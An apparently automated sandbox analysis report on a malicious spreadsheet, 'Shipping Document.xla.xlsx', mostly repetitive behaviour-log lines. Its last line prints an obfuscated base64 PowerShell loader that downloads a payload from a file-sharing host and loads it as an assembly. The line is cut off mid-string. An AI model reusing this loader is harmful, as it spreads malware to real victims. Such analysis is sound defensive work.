Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Shipping Document.xla.xlsx	Stream path 'Workbook' entropy: 7.9972533186 (max. 8.0)
Source: 02B30000.0.dr	Stream path 'Workbook' entropy: 7.99719019112 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1798	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6295	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1335	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4872	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1792	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 375	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2415	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5671	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dll

Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3668	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912	Thread sleep count: 1335 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912	Thread sleep count: 4872 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120	Thread sleep count: 1792 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120	Thread sleep count: 375 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2440	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928	Thread sleep count: 2415 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928	Thread sleep count: 5671 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2736	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -600000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZX